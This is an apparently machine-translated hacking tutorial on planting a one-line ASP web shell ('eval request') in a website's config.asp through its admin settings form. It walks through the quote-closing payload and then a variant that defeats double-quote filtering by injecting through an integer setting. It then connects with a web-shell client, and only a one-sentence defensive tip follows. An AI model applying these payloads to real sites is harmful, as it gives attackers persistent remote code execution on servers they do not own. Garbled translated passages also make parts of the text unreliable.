Insert a sentence in the background

Yesterday, the knife threw a problem in the group, saying that there was always an error when a sentence was inserted in the background. The friends in the group made a lot of ideas, but they still did not solve the problem. Later, this kid threw the question to me and I tested it yesterday. Here we will introduce the situation to you.
In general, insert a sentence in the background. If the database extension is asp, insert the database, but if there is a configuration file that can be inserted, it must be inserted into the configuration file, however, there is a big risk of inserting a configuration file, that is, if an error occurs in all disks, it may not only cause the background to be unable to log on, but may even cause the entire website system to crash. Therefore, the configuration file is inserted, be cautious.

If you want to insert a configuration file, which is usually config. asp, you must first understand the general situation of the file.

The website configuration is generally to save the website name, address, email and so on. Since it is a character, the format should be
Webname = "test website"

To insert a sentence for this configuration, we will replace test website, so we need to close two "statements and insert one sentence at the same time. The statement can be as follows:

"%> <% Eval request (" d "%> <% s ="

In config. asp

Webname = "" %> <% eval request ("d" %> <% s = ""

The first "is to close the previous configuration file", %> is to close the previous script, and then insert a sentence <% eval request ("d" %>, close the original "and %>

Therefore, add <% s = ". Pay special attention to" s = "here. If this equal sign is not available, it will become <%" ", which will inevitably cause errors.

Okay, this is the conventional method. Now let's go back to the problem and insert it according to the previous method.

After insertion, click "website Settings". An error occurs.

From this error, we can get two messages.

First, the path of the configuration file: http://www.target.com/zfbm/zfb/inc/config.asp

Second, the variable of the website name is webname.

I didn't continue watching it because it was very late yesterday. I went on a business trip today. I just got Q when I came back in the evening. I said I won it and said that double quotation marks were filtered in the background ", in combination with yesterday's errors, it turns out that, because we closed the double quotation marks, "the double quotation marks" were filtered into single quotation marks, it became webname = ", in this case, the double quotation marks are not closed. Because the double quotation marks are the control character of vbscript, config is not closed. asp operation errors are inevitable. So what should we do if the double quotation marks are filtered out.

Because a single sentence must be enclosed in double quotation marks, and the double quotation marks are filtered out, we can solve this problem using their own double quotation marks.

In the configuration file, we can also see such settings

The number of website announcements and articles. Assume that the value must be an integer value without double quotation marks.
Num = 5
Num is an integer, otherwise it is a character num = "5"

Then we can build a sentence like this,

Insert 5%> <% eval request (webname) %> <%

5 is required. Otherwise, an error will occur. Insert "open" in the website name"

Because no double quotation marks are entered and no filtering exists, we use the double quotation marks of the configuration file. The current content of the configuration file is as follows:

<% .................... Webname = "open" num = 5%> <% eval request (webname) %> <% webnum = 7 ....... %> our sentence is
Eval request ("open"), open is the seo/> password.

Connected with a kitchen knife

As shown in the preceding figure, we successfully used the configuration file to avoid the problem of double quotation marks being filtered in one sentence.

In terms of webpage design, we can add the special symbols <, %,> or combination <%, %> to prohibit the input of these symbols, which will greatly increase webpage security.